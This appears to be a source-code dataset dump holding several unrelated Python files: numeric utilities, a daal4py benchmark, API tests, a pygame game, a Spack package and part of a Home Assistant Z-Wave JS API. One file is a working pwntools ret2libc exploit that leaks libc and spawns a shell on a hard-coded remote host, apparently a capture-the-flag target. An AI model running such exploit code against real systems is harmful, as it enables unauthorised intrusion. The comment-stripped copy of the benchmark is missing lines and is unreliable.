hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c303b78b6ae5eca8c6ab383c7d16e87f6f3ecf0 | 1,367 | py | Python | src/probnum/utils/argutils.py | ralfrost/probnum | 6b0988009a9dd7ecda87ba28c9d5c0b8019981b6 | [
"MIT"
] | null | null | null | src/probnum/utils/argutils.py | ralfrost/probnum | 6b0988009a9dd7ecda87ba28c9d5c0b8019981b6 | [
"MIT"
] | 2 | 2020-12-28T19:37:16.000Z | 2020-12-28T19:37:31.000Z | src/probnum/utils/argutils.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | null | null | null | import numbers
import numpy as np
import scipy._lib._util
from probnum.type import (
DTypeArgType,
RandomStateArgType,
RandomStateType,
ScalarArgType,
ShapeArgType,
ShapeType,
)
__all__ = ["as_shape", "as_random_state", "as_numpy_scalar"]
def as_random_state(x: RandomStateArgType) -> RandomStateType:
    """Normalize a seed-like argument into a NumPy random state object.

    Delegates to SciPy's helper, which accepts ``None``, integer seeds and
    existing random-state instances.
    """
    normalize = scipy._lib._util.check_random_state
    return normalize(x)
def as_shape(x: ShapeArgType) -> ShapeType:
    """Convert a shape-like argument into a tuple of Python ``int``s.

    A single integer becomes a 1-tuple; any iterable of integers becomes a
    tuple of ``int``. A tuple that already contains only plain ``int``s is
    returned unchanged.

    Raises
    ------
    TypeError
        If ``x`` is neither an integer nor an iterable of integers.
    """
    if isinstance(x, (int, numbers.Integral, np.integer)):
        return (int(x),)
    if isinstance(x, tuple) and all(isinstance(item, int) for item in x):
        # Already in canonical form; return as-is.
        return x
    try:
        # Materialize up front so one-shot iterators (e.g. generators) are
        # not exhausted by the validation pass below, which would otherwise
        # silently yield an empty shape.
        items = tuple(x)
    except TypeError as e:
        raise TypeError(
            f"The given shape {x} must be an integer or an iterable of integers."
        ) from e
    if not all(isinstance(item, (int, numbers.Integral, np.integer)) for item in items):
        raise TypeError(f"The given shape {x} must only contain integer values.")
    return tuple(int(item) for item in items)
def as_numpy_scalar(x: ScalarArgType, dtype: DTypeArgType = None) -> np.generic:
    """Convert a scalar-like value into a NumPy scalar of the given dtype.

    Accepts plain Python/NumPy scalars as well as zero-dimensional arrays;
    anything else is rejected.
    """
    if not (np.isscalar(x) or (isinstance(x, np.ndarray) and x.ndim == 0)):
        raise ValueError("The given input is not a scalar.")
    # Indexing a 0-d array with an empty tuple unwraps it into a np.generic.
    return np.asarray(x, dtype=dtype)[()]
| 27.897959 | 88 | 0.65545 | import numbers
import numpy as np
import scipy._lib._util
from probnum.type import (
DTypeArgType,
RandomStateArgType,
RandomStateType,
ScalarArgType,
ShapeArgType,
ShapeType,
)
__all__ = ["as_shape", "as_random_state", "as_numpy_scalar"]
def as_random_state(x: RandomStateArgType) -> RandomStateType:
return scipy._lib._util.check_random_state(x)
def as_shape(x: ShapeArgType) -> ShapeType:
if isinstance(x, (int, numbers.Integral, np.integer)):
return (int(x),)
elif isinstance(x, tuple) and all(isinstance(item, int) for item in x):
return x
else:
try:
_ = iter(x)
except TypeError as e:
raise TypeError(
f"The given shape {x} must be an integer or an iterable of integers."
) from e
if not all(isinstance(item, (int, numbers.Integral, np.integer)) for item in x):
raise TypeError(f"The given shape {x} must only contain integer values.")
return tuple(int(item) for item in x)
def as_numpy_scalar(x: ScalarArgType, dtype: DTypeArgType = None) -> np.generic:
is_scalar = np.isscalar(x)
is_scalar_array = isinstance(x, np.ndarray) and x.ndim == 0
if not (is_scalar or is_scalar_array):
raise ValueError("The given input is not a scalar.")
return np.asarray(x, dtype=dtype)[()]
| true | true |
1c303bbfaf52d7094a4e084d26dd73eef9daf45f | 1,242 | py | Python | src/rf_all/daal_rf_training.py | tapojyotipaul/xgboost-benchmarks | 789b99acbf401617a45a8c82dbae1210378527d8 | [
"Apache-2.0"
] | null | null | null | src/rf_all/daal_rf_training.py | tapojyotipaul/xgboost-benchmarks | 789b99acbf401617a45a8c82dbae1210378527d8 | [
"Apache-2.0"
] | null | null | null | src/rf_all/daal_rf_training.py | tapojyotipaul/xgboost-benchmarks | 789b99acbf401617a45a8c82dbae1210378527d8 | [
"Apache-2.0"
] | null | null | null | from timeit import default_timer as timer
import xgboost as xgb
from sklearn.metrics import mean_squared_error
import daal4py as d4p
import numpy as np
import pandas as pd
import common
d4p.daalinit()
NUM_LOOPS = 100
def run_inference(num_observations:int = 1000):
    """Benchmark daal4py decision-forest regression *training*.

    Trains a 100-tree forest NUM_LOOPS times on the first
    ``num_observations`` rows of the shared dataset and prints/returns
    per-row timing statistics. NOTE(review): despite the function name and
    the module's xgboost import, the timed work here is daal4py training,
    not inference — confirm intent.
    """
    # Load the benchmark slice of the shared feature/target frames.
    train_x_df = common.get_test_data_df(X=common.X_df,size = num_observations)
    train_y_df = common.get_test_data_df(X=common.y_df,size = num_observations)
    num_rows = len(train_x_df)
    # Visual separator for the benchmark log output.
    print("_______________________________________")
    print("Total Number of Rows", num_rows)
    run_times = []
    inference_times = []
    for _ in range(NUM_LOOPS):
        start_time = timer()
        # A fresh model per loop so every iteration times a full training run.
        MODEL = d4p.decision_forest_regression_training(nTrees=100)
        train_result = MODEL.compute(train_x_df, train_y_df)
        end_time = timer()
        total_time = end_time - start_time
        # NOTE(review): 10e3 == 10_000 and 10e6 == 10_000_000 — these are not
        # clean s->ms / s->us conversions (1e3 / 1e6); confirm the intended units.
        run_times.append(total_time*10e3)
        inference_time = total_time*(10e6)/num_rows
        inference_times.append(inference_time)
    # Aggregate (mean/percentiles per common.calculate_stats) over all loops.
    return_elem = common.calculate_stats(inference_times)
    print(num_observations, ", ", return_elem)
return return_elem | 31.846154 | 79 | 0.710145 | from timeit import default_timer as timer
import xgboost as xgb
from sklearn.metrics import mean_squared_error
import daal4py as d4p
import numpy as np
import pandas as pd
import common
d4p.daalinit()
NUM_LOOPS = 100
def run_inference(num_observations:int = 1000):
train_x_df = common.get_test_data_df(X=common.X_df,size = num_observations)
train_y_df = common.get_test_data_df(X=common.y_df,size = num_observations)
num_rows = len(train_x_df)
.decision_forest_regression_training(nTrees=100)
train_result = MODEL.compute(train_x_df, train_y_df)
end_time = timer()
total_time = end_time - start_time
run_times.append(total_time*10e3)
inference_time = total_time*(10e6)/num_rows
inference_times.append(inference_time)
return_elem = common.calculate_stats(inference_times)
print(num_observations, ", ", return_elem)
return return_elem | true | true |
1c303ca7ab0ce9e52fc5302458ecdf3a2e444354 | 926 | py | Python | xlkj/kaoshi/pwn/pwn1/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | [
"MIT"
] | null | null | null | xlkj/kaoshi/pwn/pwn1/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | [
"MIT"
] | null | null | null | xlkj/kaoshi/pwn/pwn1/exp.py | haysengithub/ctf | c2cefed8470f40d0cb6bc4d1ae941a70936ea497 | [
"MIT"
] | null | null | null | from pwn import *
# CTF practice exploit (ret2libc): leak a libc address through puts(GOT),
# resolve the libc base via LibcSearcher, then return into a gadget that
# spawns a shell. Target/addresses are specific to the "pwn1" challenge.
from LibcSearcher import *
context(arch="amd64",os="linux",log_level="debug")
# Run with GDB=1 to attach a debugger in a tmux split at the breakpoint below.
GDB=args["GDB"]
context.terminal=["tmux","splitw","-h"]
# Gadget/symbol addresses from the challenge binary (non-PIE, fixed addresses).
pop_rdi=0x0000000000400823
ret=0x0000000000400576
main_addr=0x00000000004006c7
p=remote("152.136.44.97",20003)
#p=process("./pwn1")
if GDB=="1":
    gdb.attach(p,"b *0x4007b5")
elf=ELF("./pwn1")
printf_plt=elf.plt["printf"]
# Leak the resolved address of __libc_start_main from the GOT.
xx_name="__libc_start_main"
xx_got=elf.got[xx_name]
puts_plt=elf.plt["puts"]
# Stage 1 overflow: filler up to the saved registers, then
# pop rdi; puts(got_entry); return to main for a second overflow.
# NOTE(review): 1415926 / 666 / 233 / "b"*8 presumably satisfy value checks
# in the binary's stack layout — confirm against the challenge source.
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(pop_rdi)+p64(xx_got)+p64(puts_plt)+p64(main_addr)
p.sendafter("name:",payload)
xx=p.recvuntil("name:").split("\n")
print(xx)
# The leak is the third line of output; left-justify to 8 bytes and decode.
xx=u64(xx[2].ljust(8,"\x00"))
print(hex(xx))
# Identify the remote libc from the single leaked symbol and derive its base.
libc=LibcSearcher(xx_name,xx)
base=xx-libc.dump(xx_name)
print(hex(base))
# NOTE(review): 0x3f4b6 is presumably a one_gadget execve("/bin/sh") offset
# in the matched libc — verify with the one_gadget tool.
one =base+0x3f4b6
# Stage 2: same overflow, returning straight into the shell gadget.
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(one)
p.send(payload)
p.recv()
sleep(2)
if GDB=="1":
    pause()
p.interactive()
| 24.368421 | 113 | 0.706263 | from pwn import *
from LibcSearcher import *
context(arch="amd64",os="linux",log_level="debug")
GDB=args["GDB"]
context.terminal=["tmux","splitw","-h"]
pop_rdi=0x0000000000400823
ret=0x0000000000400576
main_addr=0x00000000004006c7
p=remote("152.136.44.97",20003)
if GDB=="1":
gdb.attach(p,"b *0x4007b5")
elf=ELF("./pwn1")
printf_plt=elf.plt["printf"]
xx_name="__libc_start_main"
xx_got=elf.got[xx_name]
puts_plt=elf.plt["puts"]
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(pop_rdi)+p64(xx_got)+p64(puts_plt)+p64(main_addr)
p.sendafter("name:",payload)
xx=p.recvuntil("name:").split("\n")
print(xx)
xx=u64(xx[2].ljust(8,"\x00"))
print(hex(xx))
libc=LibcSearcher(xx_name,xx)
base=xx-libc.dump(xx_name)
print(hex(base))
one =base+0x3f4b6
payload="A"*(0x110-16)+p64(1415926)+p32(666)+p32(233)+"b"*8+p64(one)
p.send(payload)
p.recv()
sleep(2)
if GDB=="1":
pause()
p.interactive()
| true | true |
1c303e019a9c09f96c42761d9f78868ee266b4b8 | 911 | py | Python | clients/python-aiohttp/generated/tests/test_pokedex_controller.py | cliffano/pokeapi-clients | 92af296c68c3e94afac52642ae22057faaf071ee | [
"MIT"
] | null | null | null | clients/python-aiohttp/generated/tests/test_pokedex_controller.py | cliffano/pokeapi-clients | 92af296c68c3e94afac52642ae22057faaf071ee | [
"MIT"
] | null | null | null | clients/python-aiohttp/generated/tests/test_pokedex_controller.py | cliffano/pokeapi-clients | 92af296c68c3e94afac52642ae22057faaf071ee | [
"MIT"
] | null | null | null | # coding: utf-8
import pytest
import json
from aiohttp import web
async def test_pokedex_list(client):
    """Verify that GET /api/v2/pokedex/ with paging params returns HTTP 200."""
    response = await client.request(
        method='GET',
        path='/api/v2/pokedex/',
        headers={'Accept': 'text/plain'},
        params=[('limit', 56), ('offset', 56)],
    )
    # On failure, include the response body in the assertion message.
    assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
async def test_pokedex_read(client):
    """Verify that GET /api/v2/pokedex/{id} returns HTTP 200."""
    response = await client.request(
        method='GET',
        path='/api/v2/pokedex/{id}'.format(id=56),
        headers={'Accept': 'text/plain'},
    )
    # On failure, include the response body in the assertion message.
    assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
| 21.186047 | 98 | 0.556531 |
import pytest
import json
from aiohttp import web
async def test_pokedex_list(client):
params = [('limit', 56),
('offset', 56)]
headers = {
'Accept': 'text/plain',
}
response = await client.request(
method='GET',
path='/api/v2/pokedex/',
headers=headers,
params=params,
)
assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
async def test_pokedex_read(client):
headers = {
'Accept': 'text/plain',
}
response = await client.request(
method='GET',
path='/api/v2/pokedex/{id}'.format(id=56),
headers=headers,
)
assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')
| true | true |
1c303e0665ded3b0c3bd5a41f5245167a180cf79 | 1,462 | py | Python | trove/tests/unittests/common/test_stream_codecs.py | sapcc/trove | c03ec0827687fba202f72f4d264ab70158604857 | [
"Apache-2.0"
] | 244 | 2015-01-01T12:04:44.000Z | 2022-03-25T23:38:39.000Z | trove/tests/unittests/common/test_stream_codecs.py | sapcc/trove | c03ec0827687fba202f72f4d264ab70158604857 | [
"Apache-2.0"
] | 6 | 2015-08-18T08:19:10.000Z | 2022-03-05T02:32:36.000Z | trove/tests/unittests/common/test_stream_codecs.py | sapcc/trove | c03ec0827687fba202f72f4d264ab70158604857 | [
"Apache-2.0"
] | 178 | 2015-01-02T15:16:58.000Z | 2022-03-23T03:30:20.000Z | # Copyright 2016 Tesora, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import os
from trove.common import stream_codecs
from trove.tests.unittests import trove_testtools
class TestStreamCodecs(trove_testtools.TestCase):
    """Round-trip tests for trove's stream codecs."""

    def setUp(self):
        super(TestStreamCodecs, self).setUp()

    def tearDown(self):
        super(TestStreamCodecs, self).tearDown()

    def test_serialize_deserialize_base64codec(self):
        """Serializing then deserializing must reproduce the input bytes."""
        codec = stream_codecs.Base64Codec()
        samples = [
            b'abc',
            b'numbers01234',
            b'non-ascii:\xe9\xff',
            bytearray(os.urandom(12)),  # arbitrary binary payload
        ]
        for sample in samples:
            round_tripped = codec.deserialize(codec.serialize(sample))
            self.assertEqual(sample, round_tripped,
                             "Serialize/Deserialize failed")
| 33.227273 | 78 | 0.674419 |
import os
from trove.common import stream_codecs
from trove.tests.unittests import trove_testtools
class TestStreamCodecs(trove_testtools.TestCase):
def setUp(self):
super(TestStreamCodecs, self).setUp()
def tearDown(self):
super(TestStreamCodecs, self).tearDown()
def test_serialize_deserialize_base64codec(self):
random_data = bytearray(os.urandom(12))
data = [b'abc',
b'numbers01234',
b'non-ascii:\xe9\xff',
random_data]
codec = stream_codecs.Base64Codec()
for datum in data:
serialized_data = codec.serialize(datum)
deserialized_data = codec.deserialize(serialized_data)
self. assertEqual(datum, deserialized_data,
"Serialize/Deserialize failed")
| true | true |
1c303eb256f57ba792c46d3cf5344ec0037aefbb | 1,826 | py | Python | QuickDemos/PygameTutorial/platformer.py | Crocster/CMPT-120L-201-22S | 7de05b152dba9975b7a5e56f1f1432cdb325d74e | [
"MIT"
] | 1 | 2022-02-19T17:57:57.000Z | 2022-02-19T17:57:57.000Z | QuickDemos/PygameTutorial/platformer.py | Crocster/CMPT-120L-201-22S | 7de05b152dba9975b7a5e56f1f1432cdb325d74e | [
"MIT"
] | null | null | null | QuickDemos/PygameTutorial/platformer.py | Crocster/CMPT-120L-201-22S | 7de05b152dba9975b7a5e56f1f1432cdb325d74e | [
"MIT"
] | 24 | 2022-02-03T01:37:44.000Z | 2022-02-17T00:00:10.000Z | import pygame
import sys
from pygame.locals import *
# Initialize pygame and the game-wide constants/surfaces.
pygame.init()
vec = pygame.math.Vector2  # 2 for two dimensional
HEIGHT = 450  # window height in pixels
WIDTH = 400  # window width in pixels
ACC = 0.5  # horizontal acceleration applied per frame while a key is held
FRIC = -0.12  # friction coefficient (opposes current velocity)
FPS = 60  # target frame rate for the main loop
FramePerSec = pygame.time.Clock()
displaysurface = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Marist Platformer")
class Player(pygame.sprite.Sprite):
    """Player sprite: a 30x30 square moved with simple per-frame physics."""

    def __init__(self):
        super().__init__()
        # Solid pink square used as the sprite image.
        self.surf = pygame.Surface((30, 30))
        self.surf.fill((255,123,201))
        self.rect = self.surf.get_rect()
        # Position/velocity/acceleration vectors (units: pixels per frame).
        self.pos = vec((10, 435))
        self.vel = vec(0,0)
        self.acc = vec(0,0)

    def move(self):
        """Advance one physics step from keyboard input (called once per frame)."""
        # Acceleration is rebuilt each frame from input + friction only.
        self.acc = vec(0,0)
        pressed_keys = pygame.key.get_pressed()
        if pressed_keys[K_LEFT]:
            self.acc.x = -ACC
        if pressed_keys[K_RIGHT]:
            self.acc.x = ACC
        # Friction is proportional to (and opposes) current horizontal speed.
        self.acc.x += self.vel.x * FRIC
        self.vel += self.acc
        # Kinematics update: pos += v*t + 0.5*a*t^2 with t = 1 frame.
        self.pos += self.vel + 0.5 * self.acc
        # Wrap horizontally: leaving one screen edge re-enters at the other.
        if self.pos.x > WIDTH:
            self.pos.x = 0
        if self.pos.x < 0:
            self.pos.x = WIDTH
        self.rect.midbottom = self.pos
class platform(pygame.sprite.Sprite):
    """Static green floor spanning the bottom of the window."""

    def __init__(self):
        super().__init__()
        floor = pygame.Surface((WIDTH, 20))
        floor.fill((130, 255, 122))
        self.surf = floor
        self.rect = floor.get_rect(center=(WIDTH / 2, HEIGHT - 10))
# Build the scene: one floor platform and one player, tracked in a group
# so they can be drawn with a single loop.
PT1 = platform()
P1 = Player()
all_sprites = pygame.sprite.Group()
all_sprites.add(PT1)
all_sprites.add(P1)

# Main game loop: handle events, redraw, step physics, present the frame.
while True:
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
    # Clear to black, then blit every sprite at its current rect.
    displaysurface.fill((0,0,0))
    for entity in all_sprites:
        displaysurface.blit(entity.surf, entity.rect)
    P1.move()
    pygame.display.update()
FramePerSec.tick(FPS) | 23.113924 | 71 | 0.586528 | import pygame
import sys
from pygame.locals import *
pygame.init()
vec = pygame.math.Vector2
HEIGHT = 450
WIDTH = 400
ACC = 0.5
FRIC = -0.12
FPS = 60
FramePerSec = pygame.time.Clock()
displaysurface = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Marist Platformer")
class Player(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.surf = pygame.Surface((30, 30))
self.surf.fill((255,123,201))
self.rect = self.surf.get_rect()
self.pos = vec((10, 435))
self.vel = vec(0,0)
self.acc = vec(0,0)
def move(self):
self.acc = vec(0,0)
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_LEFT]:
self.acc.x = -ACC
if pressed_keys[K_RIGHT]:
self.acc.x = ACC
self.acc.x += self.vel.x * FRIC
self.vel += self.acc
self.pos += self.vel + 0.5 * self.acc
if self.pos.x > WIDTH:
self.pos.x = 0
if self.pos.x < 0:
self.pos.x = WIDTH
self.rect.midbottom = self.pos
class platform(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.surf = pygame.Surface((WIDTH, 20))
self.surf.fill((130,255,122))
self.rect = self.surf.get_rect(center = (WIDTH/2, HEIGHT - 10))
PT1 = platform()
P1 = Player()
all_sprites = pygame.sprite.Group()
all_sprites.add(PT1)
all_sprites.add(P1)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
displaysurface.fill((0,0,0))
for entity in all_sprites:
displaysurface.blit(entity.surf, entity.rect)
P1.move()
pygame.display.update()
FramePerSec.tick(FPS) | true | true |
1c303ed5063c2386e4bfac776b7b7e5f21c6f757 | 1,377 | py | Python | var/spack/repos/builtin/packages/fl/package.py | kkauder/spack | 6ae8d5c380c1f42094b05d38be26b03650aafb39 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2019-02-10T13:47:48.000Z | 2019-04-17T13:05:17.000Z | var/spack/repos/builtin/packages/fl/package.py | kkauder/spack | 6ae8d5c380c1f42094b05d38be26b03650aafb39 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 17 | 2019-03-21T15:54:00.000Z | 2022-03-29T19:34:28.000Z | var/spack/repos/builtin/packages/fl/package.py | kkauder/spack | 6ae8d5c380c1f42094b05d38be26b03650aafb39 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2018-04-06T09:04:11.000Z | 2020-01-24T12:52:12.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
# Map of release version -> {platform-machine key: (sha256, download url)}
# for the prebuilt binary distributions.
_versions = {
    '0.79.47': {
        'Linux-x86_64': ('b8a4a74118c1a024313bf912261fbc016a53f2d15adb1226217f2a10a9f7ca9a', 'https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz'),
        'Linux-aarch64': ('3ff052013daf319927d04ba83b8f90c12575983911faf6c1559437062032b669', 'http://www.flxpert.hu/fl/fl_0.79.47-aarch64-linux.tar.gz')
    }
}
class Fl(Package):
    """Fawlty Language is an IDL8
    (Interactive Data Language) compatible compiler."""

    homepage = "https://www.flxpert.hu/fl/"
    url = "https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz"

    # Register a Spack version() directive for each prebuilt binary that
    # matches this host's "<system>-<machine>" key in _versions.
    for ver, packages in _versions.items():
        key = "{0}-{1}".format(platform.system(), platform.machine())
        pkg = packages.get(key)
        if pkg:
            version(ver, sha256=pkg[0], url=pkg[1])

    def install(self, spec, prefix):
        """Copy the unpacked binary distribution into the install prefix."""
        # Binary-only package: supported on Linux x86_64/aarch64, nothing to build.
        if (self.spec.satisfies('platform=linux') and
                self.spec.target.family in ['x86_64', 'aarch64']):
            # The tarball unpacks into fl_<version>/ — install its contents.
            with working_dir('fl_{0}'.format(spec.version)):
                install_tree('.', prefix)
        else:
            raise InstallError('fl requires Linux x86_64 or aarch64 platform.')
| 37.216216 | 153 | 0.659405 |
from spack import *
import platform
_versions = {
'0.79.47': {
'Linux-x86_64': ('b8a4a74118c1a024313bf912261fbc016a53f2d15adb1226217f2a10a9f7ca9a', 'https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz'),
'Linux-aarch64': ('3ff052013daf319927d04ba83b8f90c12575983911faf6c1559437062032b669', 'http://www.flxpert.hu/fl/fl_0.79.47-aarch64-linux.tar.gz')
}
}
class Fl(Package):
homepage = "https://www.flxpert.hu/fl/"
url = "https://www.flxpert.hu/fl/fl_0.79.47-amd64-linux.tar.gz"
for ver, packages in _versions.items():
key = "{0}-{1}".format(platform.system(), platform.machine())
pkg = packages.get(key)
if pkg:
version(ver, sha256=pkg[0], url=pkg[1])
def install(self, spec, prefix):
if (self.spec.satisfies('platform=linux') and
self.spec.target.family in ['x86_64', 'aarch64']):
with working_dir('fl_{0}'.format(spec.version)):
install_tree('.', prefix)
else:
raise InstallError('fl requires Linux x86_64 or aarch64 platform.')
| true | true |
1c303eea0533e7776a120588819a11955b42166d | 44,135 | py | Python | homeassistant/components/zwave_js/api.py | sebcaps/core | 4a058503ca49fa861124fa3bb6abbcd5e8dd0798 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/zwave_js/api.py | sebcaps/core | 4a058503ca49fa861124fa3bb6abbcd5e8dd0798 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/zwave_js/api.py | sebcaps/core | 4a058503ca49fa861124fa3bb6abbcd5e8dd0798 | [
"Apache-2.0"
] | null | null | null | """Websocket API for Z-Wave JS."""
from __future__ import annotations
import dataclasses
from functools import partial, wraps
import json
from typing import Any, Callable
from aiohttp import hdrs, web, web_exceptions, web_request
import voluptuous as vol
from zwave_js_server import dump
from zwave_js_server.client import Client
from zwave_js_server.const import CommandClass, LogLevel
from zwave_js_server.exceptions import (
BaseZwaveJSServerError,
FailedCommand,
InvalidNewValue,
NotFoundError,
SetValueFailed,
)
from zwave_js_server.firmware import begin_firmware_update
from zwave_js_server.model.firmware import (
FirmwareUpdateFinished,
FirmwareUpdateProgress,
)
from zwave_js_server.model.log_config import LogConfig
from zwave_js_server.model.log_message import LogMessage
from zwave_js_server.model.node import Node
from zwave_js_server.util.node import async_set_config_parameter
from homeassistant.components import websocket_api
from homeassistant.components.http.view import HomeAssistantView
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.components.websocket_api.const import (
ERR_NOT_FOUND,
ERR_NOT_SUPPORTED,
ERR_UNKNOWN_ERROR,
)
from homeassistant.config_entries import ConfigEntry, ConfigEntryState
from homeassistant.const import CONF_URL
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import Unauthorized
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import DeviceEntry
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import (
CONF_DATA_COLLECTION_OPTED_IN,
DATA_CLIENT,
DATA_UNSUBSCRIBE,
DOMAIN,
EVENT_DEVICE_ADDED_TO_REGISTRY,
)
from .helpers import async_enable_statistics, update_data_collection_preference
from .services import BITMASK_SCHEMA
# general API constants
ID = "id"
ENTRY_ID = "entry_id"
ERR_NOT_LOADED = "not_loaded"
NODE_ID = "node_id"
COMMAND_CLASS_ID = "command_class_id"
TYPE = "type"
PROPERTY = "property"
PROPERTY_KEY = "property_key"
VALUE = "value"
SECURE = "secure"

# constants for log config commands
CONFIG = "config"
LEVEL = "level"
LOG_TO_FILE = "log_to_file"
FILENAME = "filename"
FORCE_CONSOLE = "force_console"

# constants for setting config parameters
VALUE_ID = "value_id"
STATUS = "status"

# constants for data collection
# NOTE: ENABLED is shared by the log-config and data-collection payloads;
# it was previously defined twice with the same value.
ENABLED = "enabled"
OPTED_IN = "opted_in"
def async_get_entry(orig_func: Callable) -> Callable:
    """Decorate an async websocket handler to resolve and inject the config entry."""

    @wraps(orig_func)
    async def with_entry(
        hass: HomeAssistant, connection: ActiveConnection, msg: dict
    ) -> None:
        """Look up the entry and client for msg[ENTRY_ID] and pass them through."""
        entry_id = msg[ENTRY_ID]
        entry = hass.config_entries.async_get_entry(entry_id)
        # Reject unknown or not-yet-loaded entries before calling the handler.
        error = None
        if entry is None:
            error = (ERR_NOT_FOUND, f"Config entry {entry_id} not found")
        elif entry.state is not ConfigEntryState.LOADED:
            error = (ERR_NOT_LOADED, f"Config entry {entry_id} not loaded")
        if error is not None:
            connection.send_error(msg[ID], *error)
            return
        client = hass.data[DOMAIN][entry_id][DATA_CLIENT]
        await orig_func(hass, connection, msg, entry, client)

    return with_entry
def async_get_node(orig_func: Callable) -> Callable:
    """Decorate an async websocket handler to resolve and inject the node."""

    @async_get_entry
    @wraps(orig_func)
    async def with_node(
        hass: HomeAssistant,
        connection: ActiveConnection,
        msg: dict,
        entry: ConfigEntry,
        client: Client,
    ) -> None:
        """Look up msg[NODE_ID] on the controller and pass the node through."""
        node_id = msg[NODE_ID]
        if (node := client.driver.controller.nodes.get(node_id)) is None:
            connection.send_error(msg[ID], ERR_NOT_FOUND, f"Node {node_id} not found")
            return
        await orig_func(hass, connection, msg, node)

    return with_node
def async_handle_failed_command(orig_func: Callable) -> Callable:
    """Decorate an async function to translate FailedCommand into a WS error."""

    @wraps(orig_func)
    async def with_error_handling(
        hass: HomeAssistant,
        connection: ActiveConnection,
        msg: dict,
        *args: Any,
        **kwargs: Any,
    ) -> None:
        """Run the handler; report FailedCommand back over the websocket."""
        try:
            await orig_func(hass, connection, msg, *args, **kwargs)
        except FailedCommand as err:
            # Tear down any event subscriptions the handler registered
            # before the command failed.
            for unsub in msg.get(DATA_UNSUBSCRIBE) or []:
                unsub()
            connection.send_error(msg[ID], err.error_code, err.args[0])

    return with_error_handling
@callback
def async_register_api(hass: HomeAssistant) -> None:
    """Register all of our api endpoints."""
    # Websocket command handlers, registered in a single pass.
    handlers = (
        websocket_network_status,
        websocket_node_status,
        websocket_node_state,
        websocket_node_metadata,
        websocket_ping_node,
        websocket_add_node,
        websocket_stop_inclusion,
        websocket_stop_exclusion,
        websocket_remove_node,
        websocket_remove_failed_node,
        websocket_replace_failed_node,
        websocket_begin_healing_network,
        websocket_subscribe_heal_network_progress,
        websocket_stop_healing_network,
        websocket_refresh_node_info,
        websocket_refresh_node_values,
        websocket_refresh_node_cc_values,
        websocket_heal_node,
        websocket_set_config_parameter,
        websocket_get_config_parameters,
        websocket_subscribe_log_updates,
        websocket_update_log_config,
        websocket_get_log_config,
        websocket_update_data_collection_preference,
        websocket_data_collection_status,
        websocket_version_info,
        websocket_abort_firmware_update,
        websocket_subscribe_firmware_update_status,
        websocket_check_for_config_updates,
        websocket_install_config_update,
    )
